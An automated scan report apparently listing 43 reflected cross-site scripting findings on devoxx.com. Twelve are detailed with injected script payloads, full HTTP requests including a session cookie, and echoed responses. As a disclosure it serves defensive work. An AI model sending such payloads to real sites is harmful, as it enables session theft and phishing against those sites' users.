Report generated by XSS.CX at Mon Nov 15 11:49:15 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


Contents

Loading

1. Cross-site scripting (reflected)

1.1. http://devoxx.com/display/Devoxx2K10/Contact+Us [name of an arbitrarily supplied request parameter]

1.2. http://devoxx.com/display/Devoxx2K10/Devoxx+2008 [name of an arbitrarily supplied request parameter]

1.3. http://devoxx.com/display/Devoxx2K10/Devoxx+2009 [name of an arbitrarily supplied request parameter]

1.4. http://devoxx.com/display/Devoxx2K10/Home [a8f51-->

HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM

parameter]

1.5. http://devoxx.com/display/Devoxx2K10/Home [a8f51-->

1.6. http://devoxx.com/display/Devoxx2K10/Home [a8f51-->HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM parameter]

1.7. http://devoxx.com/display/Devoxx2K10/Home [a8f51-->db69e0aef33 parameter]

1.8. http://devoxx.com/display/Devoxx2K10/Home [name of an arbitrarily supplied request parameter]

1.9. http://devoxx.com/display/Devoxx2K10/Javaholics [name of an arbitrarily supplied request parameter]

1.10. http://devoxx.com/display/Devoxx2K10/Jboss [name of an arbitrarily supplied request parameter]

1.11. http://devoxx.com/display/Devoxx2K10/News [name of an arbitrarily supplied request parameter]

1.12. http://devoxx.com/display/Devoxx2K10/Newsletter [name of an arbitrarily supplied request parameter]

1.13. http://devoxx.com/display/Devoxx2K10/Oracle [name of an arbitrarily supplied request parameter]

1.14. http://devoxx.com/display/Devoxx2K10/Partners [name of an arbitrarily supplied request parameter]

1.15. http://devoxx.com/display/Devoxx2K10/Practical [name of an arbitrarily supplied request parameter]

1.16. http://devoxx.com/display/Devoxx2K10/Privacy+Policy [name of an arbitrarily supplied request parameter]

1.17. http://devoxx.com/display/Devoxx2K10/Schedule [name of an arbitrarily supplied request parameter]

1.18. http://devoxx.com/display/Devoxx2K10/Schedule+REST+interface [name of an arbitrarily supplied request parameter]

1.19. http://devoxx.com/display/Devoxx2K10/Schedules [name of an arbitrarily supplied request parameter]

1.20. http://devoxx.com/display/Devoxx2K10/Sidebar [name of an arbitrarily supplied request parameter]

1.21. http://devoxx.com/display/Devoxx2K10/Sponsors [name of an arbitrarily supplied request parameter]

1.22. http://devoxx.com/display/Devoxx2K10/Twitter [name of an arbitrarily supplied request parameter]

1.23. http://devoxx.com/ [User-Agent HTTP header]

1.24. http://devoxx.com/display/Devoxx2K10 [User-Agent HTTP header]

1.25. http://devoxx.com/display/Devoxx2K10/Contact+Us [User-Agent HTTP header]

1.26. http://devoxx.com/display/Devoxx2K10/Devoxx+2008 [User-Agent HTTP header]

1.27. http://devoxx.com/display/Devoxx2K10/Devoxx+2009 [User-Agent HTTP header]

1.28. http://devoxx.com/display/Devoxx2K10/Home [User-Agent HTTP header]

1.29. http://devoxx.com/display/Devoxx2K10/Javaholics [User-Agent HTTP header]

1.30. http://devoxx.com/display/Devoxx2K10/Jboss [User-Agent HTTP header]

1.31. http://devoxx.com/display/Devoxx2K10/News [User-Agent HTTP header]

1.32. http://devoxx.com/display/Devoxx2K10/Newsletter [User-Agent HTTP header]

1.33. http://devoxx.com/display/Devoxx2K10/Oracle [User-Agent HTTP header]

1.34. http://devoxx.com/display/Devoxx2K10/Partners [User-Agent HTTP header]

1.35. http://devoxx.com/display/Devoxx2K10/Practical [User-Agent HTTP header]

1.36. http://devoxx.com/display/Devoxx2K10/Privacy+Policy [User-Agent HTTP header]

1.37. http://devoxx.com/display/Devoxx2K10/Schedule [User-Agent HTTP header]

1.38. http://devoxx.com/display/Devoxx2K10/Schedule+REST+interface [User-Agent HTTP header]

1.39. http://devoxx.com/display/Devoxx2K10/Schedules [User-Agent HTTP header]

1.40. http://devoxx.com/display/Devoxx2K10/Sidebar [User-Agent HTTP header]

1.41. http://devoxx.com/display/Devoxx2K10/Sponsors [User-Agent HTTP header]

1.42. http://devoxx.com/display/Devoxx2K10/Twitter [User-Agent HTTP header]

1.43. http://devoxx.com/homepage.action [User-Agent HTTP header]



1. Cross-site scripting (reflected)
There are 43 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://devoxx.com/display/Devoxx2K10/Contact+Us [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Contact+Us

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6c9c5--><script>alert(1)</script>329e4ea39cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Contact+Us?6c9c5--><script>alert(1)</script>329e4ea39cd=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:40 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842960278
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35864

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Contact+Us?6c9c5--><script>alert(1)</script>329e4ea39cd=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@381c692d
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.2. http://devoxx.com/display/Devoxx2K10/Devoxx+2008 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Devoxx+2008

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cecbd--><script>alert(1)</script>01ad4165a5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Devoxx+2008?cecbd--><script>alert(1)</script>01ad4165a5a=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:26 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843006197
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 140846

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Devoxx+2008?cecbd--><script>alert(1)</script>01ad4165a5a=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@1380179f
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.3. http://devoxx.com/display/Devoxx2K10/Devoxx+2009 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Devoxx+2009

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4b156--><script>alert(1)</script>9c82cd46bd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Devoxx+2009?4b156--><script>alert(1)</script>9c82cd46bd5=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:44:30 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843070377
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 174350

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Devoxx+2009?4b156--><script>alert(1)</script>9c82cd46bd5=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@2821886c
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.4. http://devoxx.com/display/Devoxx2K10/Home [a8f51-->

HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM

parameter]
 previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The value of the a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1> request parameter is copied into the HTML document as plain text between tags. The payload 92591<script>alert(1)</script>ed41ee64bf1 was submitted in the a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1>=192591<script>alert(1)</script>ed41ee64bf1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:35:55 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842555366
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38447

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
...[SNIP]...
</H1>=192591<script>alert(1)</script>ed41ee64bf1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@3b08eade
adaptavist.builder.helper: com.atlassia
...[SNIP]...

1.5. http://devoxx.com/display/Devoxx2K10/Home [a8f51-->  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The value of the a8f51--><script>alert(1)</script><font%20color request parameter is copied into the name of an HTML tag. The payload 8b688><script>alert(1)</script>a75c5490369 was submitted in the a8f51--><script>alert(1)</script><font%20color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script><font%20color="8b688><script>alert(1)</script>a75c5490369 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:35:55 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842555802
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38413

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
...[SNIP]...
<font%20color="8b688><script>alert(1)</script>a75c5490369'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@6c5fc006
adaptavist.builder.helper: com.atlassia
...[SNIP]...

1.6. http://devoxx.com/display/Devoxx2K10/Home [a8f51-->HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The value of the a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM request parameter is copied into the HTML document as plain text between tags. The payload b0d96<script>alert(1)</script>c9b2c36aef6 was submitted in the a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM=1b0d96<script>alert(1)</script>c9b2c36aef6 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:35:56 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842556135
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM=1b0d96<script>alert(1)</script>c9b2c36aef6'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@166975b9
adaptavist.builder.helper: com.atlassia
...[SNIP]...

1.7. http://devoxx.com/display/Devoxx2K10/Home [a8f51-->db69e0aef33 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The value of the a8f51--><script>alert(1)</script>db69e0aef33 request parameter is copied into the HTML document as plain text between tags. The payload f89e1<script>alert(1)</script>3201c43307f was submitted in the a8f51--><script>alert(1)</script>db69e0aef33 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>db69e0aef33=1f89e1<script>alert(1)</script>3201c43307f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:35:56 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842556120
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
...[SNIP]...
</script>db69e0aef33=1f89e1<script>alert(1)</script>3201c43307f'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@2db3dffd
adaptavist.builder.helper: com.atlassia
...[SNIP]...

1.8. http://devoxx.com/display/Devoxx2K10/Home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 10455--><script>alert(1)</script>0b98aba86be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Home?10455--><script>alert(1)</script>0b98aba86be=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:36:15 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842575740
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38370

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
...[SNIP]...
727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home?10455--><script>alert(1)</script>0b98aba86be=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@555cc586
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.9. http://devoxx.com/display/Devoxx2K10/Javaholics [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Javaholics

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5079f--><script>alert(1)</script>6c6c8244915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Javaholics?5079f--><script>alert(1)</script>6c6c8244915=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:26 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842826176
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 131053

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Javaholics?5079f--><script>alert(1)</script>6c6c8244915=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@219107ac
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.10. http://devoxx.com/display/Devoxx2K10/Jboss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Jboss

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 579a4--><script>alert(1)</script>b3f778dd671 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Jboss?579a4--><script>alert(1)</script>b3f778dd671=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:10 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842930541
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35549

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Jboss?579a4--><script>alert(1)</script>b3f778dd671=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@28c0e5ed
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.11. http://devoxx.com/display/Devoxx2K10/News [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/News

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 35f79--><script>alert(1)</script>b25f2783080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/News?35f79--><script>alert(1)</script>b25f2783080=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:12 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842812010
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38188

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/News?35f79--><script>alert(1)</script>b25f2783080=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@3a01ab9c
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.12. http://devoxx.com/display/Devoxx2K10/Newsletter [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Newsletter

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4c08e--><script>alert(1)</script>092395d5d3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Newsletter?4c08e--><script>alert(1)</script>092395d5d3c=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:27 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842947522
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 37934

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Newsletter?4c08e--><script>alert(1)</script>092395d5d3c=1'
contextPath : ''
action name : 'viewpage'
*********
